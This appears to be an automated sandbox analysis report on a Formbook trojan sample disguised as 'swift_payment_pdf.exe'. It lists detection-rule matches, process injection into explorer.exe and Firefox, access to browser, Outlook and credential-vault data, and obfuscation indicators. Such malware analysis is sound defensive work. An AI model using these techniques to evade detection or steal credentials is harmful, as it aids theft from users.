            Source: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2254428073.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: swift_payment_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, VYn5ZC04Xh7blNpXED.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.swift_payment_pdf.exe.4ac3a70.2.raw.unpack, DsPhWEG7fYA6PrMRVN.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.swift_payment_pdf.exe.4ac3a70.2.raw.unpack, DsPhWEG7fYA6PrMRVN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.swift_payment_pdf.exe.4ac3a70.2.raw.unpack, DsPhWEG7fYA6PrMRVN.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.swift_payment_pdf.exe.7450000.5.raw.unpack, DsPhWEG7fYA6PrMRVN.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.swift_payment_pdf.exe.7450000.5.raw.unpack, DsPhWEG7fYA6PrMRVN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.swift_payment_pdf.exe.7450000.5.raw.unpack, DsPhWEG7fYA6PrMRVN.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, DsPhWEG7fYA6PrMRVN.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, DsPhWEG7fYA6PrMRVN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, DsPhWEG7fYA6PrMRVN.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.swift_payment_pdf.exe.4ac3a70.2.raw.unpack, VYn5ZC04Xh7blNpXED.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.swift_payment_pdf.exe.7450000.5.raw.unpack, VYn5ZC04Xh7blNpXED.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@10/7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\swift_payment_pdf.exe.logJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeMutant created: NULL
            Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\782yF2SJJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: swift_payment_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: swift_payment_pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: explorer.exe, 00000007.00000002.3553716151.000000000324D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3553716151.000000000326E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: swift_payment_pdf.exeVirustotal: Detection: 26%
            Source: unknownProcess created: C:\Users\user\Desktop\swift_payment_pdf.exe "C:\Users\user\Desktop\swift_payment_pdf.exe"
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess created: C:\Users\user\Desktop\swift_payment_pdf.exe "C:\Users\user\Desktop\swift_payment_pdf.exe"
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\SysWOW64\explorer.exe"
            Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess created: C:\Users\user\Desktop\swift_payment_pdf.exe "C:\Users\user\Desktop\swift_payment_pdf.exe"Jump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\SysWOW64\explorer.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: swift_payment_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: swift_payment_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: swift_payment_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: explorer.pdbUGP source: AbWHWpocGREf.exe, 00000006.00000003.2193822463.000000000520F000.00000004.00000001.00020000.00000000.sdmp, AbWHWpocGREf.exe, 00000006.00000003.2192638369.0000000004DAB000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: iDIX.pdb source: swift_payment_pdf.exe
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: AbWHWpocGREf.exe, 00000006.00000000.2178286710.00000000001CE000.00000002.00000001.01000000.0000000C.sdmp, AbWHWpocGREf.exe, 00000008.00000000.2318584238.00000000001CE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: iDIX.pdbSHA256 source: swift_payment_pdf.exe
            Source: Binary string: wntdll.pdbUGP source: swift_payment_pdf.exe, 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2255178706.0000000004DF1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2253539982.0000000004C4C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: swift_payment_pdf.exe, swift_payment_pdf.exe, 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, explorer.exe, 00000007.00000003.2255178706.0000000004DF1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2253539982.0000000004C4C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: explorer.pdb source: AbWHWpocGREf.exe, 00000006.00000003.2193822463.000000000520F000.00000004.00000001.00020000.00000000.sdmp, AbWHWpocGREf.exe, 00000006.00000003.2192638369.0000000004DAB000.00000004.00000001.00020000.00000000.sdmp

            Data Obfuscation

            Source: swift_payment_pdf.exe, StringListEditor.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, DsPhWEG7fYA6PrMRVN.cs.Net Code: Bfau2X4LvA System.Reflection.Assembly.Load(byte[])
            Source: 0.2.swift_payment_pdf.exe.7450000.5.raw.unpack, DsPhWEG7fYA6PrMRVN.cs.Net Code: Bfau2X4LvA System.Reflection.Assembly.Load(byte[])
            Source: 0.2.swift_payment_pdf.exe.2ee85a0.1.raw.unpack, -Module-.cs.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.swift_payment_pdf.exe.2ee85a0.1.raw.unpack, PingPong.cs.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.swift_payment_pdf.exe.7a50000.6.raw.unpack, -Module-.cs.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.swift_payment_pdf.exe.7a50000.6.raw.unpack, PingPong.cs.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.swift_payment_pdf.exe.4ac3a70.2.raw.unpack, DsPhWEG7fYA6PrMRVN.cs.Net Code: Bfau2X4LvA System.Reflection.Assembly.Load(byte[])
            Source: 7.2.explorer.exe.55ccd08.2.raw.unpack, StringListEditor.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 8.0.AbWHWpocGREf.exe.26acd08.1.raw.unpack, StringListEditor.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 8.2.AbWHWpocGREf.exe.26acd08.1.raw.unpack, StringListEditor.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 9.2.firefox.exe.c89cd08.0.raw.unpack, StringListEditor.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 0_2_014C9C40 pushad ; iretd 0_2_014C9C6D
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 0_2_04ED93E0 push esp; iretd 0_2_04ED93E1
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0041A874 push cs; iretd 5_2_0041A875
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_004248F3 push edi; ret 5_2_004248FE
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0040209B push cs; retf 5_2_004020C7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_004051BA push esi; ret 5_2_004051C7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0040729C push edi; retf 5_2_004072CB
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_00403410 push eax; ret 5_2_00403412
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0040CCD1 push ecx; iretd 5_2_0040CCD7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0040ADEE push ss; ret 5_2_0040ADEF
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0042C743 push eax; iretd 5_2_0042C8F1
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0040A777 push ebx; iretd 5_2_0040A7B2
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0132225F pushad ; ret 5_2_013227F9
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013227FA pushad ; ret 5_2_013227F9
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013509AD push ecx; mov dword ptr [esp], ecx5_2_013509B6
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0132283D push eax; iretd 5_2_01322858
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeCode function: 6_2_0493B437 pushad ; iretd 6_2_0493B438
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeCode function: 6_2_04926C5D push ebx; iretd 6_2_04926C98
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeCode function: 6_2_04940DD9 push edi; ret 6_2_04940DE4
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeCode function: 6_2_04936D5A push cs; iretd 6_2_04936D5B
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeCode function: 6_2_049216A0 push esi; ret 6_2_049216AD
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeCode function: 6_2_04923782 push edi; retf 6_2_049237B1
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeCode function: 6_2_049291B7 push ecx; iretd 6_2_049291BD
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeCode function: 6_2_0493B1C7 pushad ; iretd 6_2_0493B1C8
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeCode function: 6_2_049272D4 push ss; ret 6_2_049272D5
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FA27FA pushad ; ret 7_2_04FA27F9
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FA225F pushad ; ret 7_2_04FA27F9
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FA283D push eax; iretd 7_2_04FA2858
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FD09AD push ecx; mov dword ptr [esp], ecx7_2_04FD09B6
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04FA1368 push eax; iretd 7_2_04FA1369
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_02EFE2D0 push cs; iretd 7_2_02EFE323
            Source: swift_payment_pdf.exeStatic PE information: section name: .text entropy: 7.951002807224344
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, K22sTI10TLEnmqFWQX.cs | High entropy of concatenated method names: 'YUYeCpfrvI', 'RTWeo4HwIW', 'Yc3eu5lqX6', 'HKYeYjwxvJ', 'bCSeGhAgq5', 'sbLerkFsBh', 'ytPe3Bb9Bw', 'QIKiKmFW2U', 'Fw3iJGSGWS', 'gJHi4D3lgA'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, NwqgU75Q3WklKJuK95.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'nP0W4OxP5l', 'd8YWD2k32e', 'mqtWz658GJ', 'IIsoFgVfsZ', 'sgmoCYRfi2', 'dOPoWLcX99', 's3boo7Kved', 'ENAREod8kUaM2fjv8QD'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, Vvei5OXXISPxIy8J1T.cs | High entropy of concatenated method names: 'ze8rUG52X7', 'TZCrEyXMt8', 'KpgM1Ib6xZ', 'g48MyZo04L', 'SFWMjDsCiQ', 'jljMAKspLE', 'ImXMQFTtji', 'vCeM945VRP', 'rN4MxPmy3s', 'E33M5b4odi'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, VYn5ZC04Xh7blNpXED.cs | High entropy of concatenated method names: 'rwFG6ovSWi', 'Po3G0xKlfr', 'pHwGT44cKu', 'FQ6GNRALcV', 'dotGS5jaVg', 'SweGwBfuV8', 'wd7GKSSVSA', 'g8cGJVbkJW', 'XTEG4GlbjI', 'ReLGDL1mbS'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, cT6mCptZsNYngMt5JL.cs | High entropy of concatenated method names: 'ifZiYt5nBV', 'OrFiG8bgeG', 'JD6iMTY0LF', 'lVdir2TfeQ', 'L39i3y5lIH', 'xggivMUHp3', 'Lr1iVMfDVt', 'WpqiRkqiIF', 'AYEiZPC092', 'Ym3ipZmv03'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, nn0dYmoWlVmAMqLHuC.cs | High entropy of concatenated method names: 'bttvbwMgxi', 'awlvHLm0EO', 'xnFv2K6ui4', 'gAmvIfhHno', 'agDvUNfShe', 'uj4vkMuqgS', 'BnDvE4c1Ds', 'sNcvc2xZgV', 'xT0vtsuvh0', 'UUmvgCBJ53'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, kOBUaOVQ5piXnJWiuMJ.cs | High entropy of concatenated method names: 'XLJebiWVLv', 'bLNeHEjHX4', 'y53e2oH5Kx', 'vKneImBco9', 'TlYeU7loXO', 'YXxekCGHkK', 'SWjeEc3BZq', 'bcOecqTlIu', 'aoLet7Uih7', 'MhLegSAfd2'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, y1ibDTrE6BWROJqcoa.cs | High entropy of concatenated method names: 'ecOXVfxcpSZuDEQX1K0', 'BmFMNyx0WUDGPduZsrP', 'DN03iu0pPG', 'oMl3evicDL', 'HUh3XgwfhO', 'PwywRbx9FVNqFtTBIIb', 'oqXm7Gx2HsLR2ftqWhJ'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, yOwvLKV6yBbqRyw99XL.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xcRX6FIBL7', 'iBYX064Bur', 'PvRXTLg7BR', 'QeEXNiQdck', 'zZNXSmK2bc', 'KF9Xwsw1HD', 'agQXKdHsyw'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, nfiGd2JckkN7waNTNT.cs | High entropy of concatenated method names: 'ewovYVxtMs', 'kA2vMpVPS7', 'bXdv3eAkRt', 'i1u3DvEhZ9', 'mJ73z5Ypmc', 'HejvF6BHEy', 'ruBvCxQm8j', 'RPYvWxjX8C', 'XtpvoxGhBd', 'rBJvuO7TKN'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, hf2GnK73C7uyAUGYyh.cs | High entropy of concatenated method names: 'QwtsZnVaeZ', 'WdEspxHysN', 'ToString', 'IfBsYd5Qxi', 'XeGsGSvYZa', 'kw2sM0SROh', 'u95srltRrL', 'n6Ws3oWXO2', 'b2fsvDyMd5', 'QXtsVJP97A'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, snC1gDPdXbxgOUtoyd.cs | High entropy of concatenated method names: 'Dispose', 'mjJC4NEZC4', 'fYQWmpMnEw', 'OFDddP2HL4', 'DUwCDhTH8v', 'UHNCzrWP4o', 'ProcessDialogKey', 'qImWFpqVxo', 'DboWCyBqyT', 'EXvWWgo6AU'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, HNAg6nCmQTk1mWUs0C.cs | High entropy of concatenated method names: 'uSa2iUhf5', 'S8XItdyp5', 'K3Akd8TUH', 'maAEck55X', 'hwetZNdHS', 'npVghv2wL', 'bQFcD8aEv9mCcu1osi', 'KGdQ5UbAAaH9XptG5u', 'raLiFs1Vp', 'mxPXw5vmv'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, zMjFbSkaBuf7I5WL3T.cs | High entropy of concatenated method names: 'MxTsJb09KA', 'UVfsDJEPip', 'io8iFwJOpe', 'W3RiCVZfWR', 'FuxsBHim4t', 'C5bsOwe0PM', 'gijsPtL16k', 'GmJs6BefUr', 'YY3s05cyhL', 'x0IsTyXQNM'
            Source: 0.2.swift_payment_pdf.exe.4b47890.3.raw.unpack, YUErdkgo3QAl0D7abE.cs | High entropy of concatenated method names: 'H13MIMLG73', 'cXJMknL97g', 'NolMc6JNQ3', 'Dy4MttfLdo', 'Rb9MauwUuP', 'MIXMlJa1pp', 'aOoMspROZh', 'DjwMiNvDQf', 'KNYMetbsPf', 'TdFMXNKCwj'
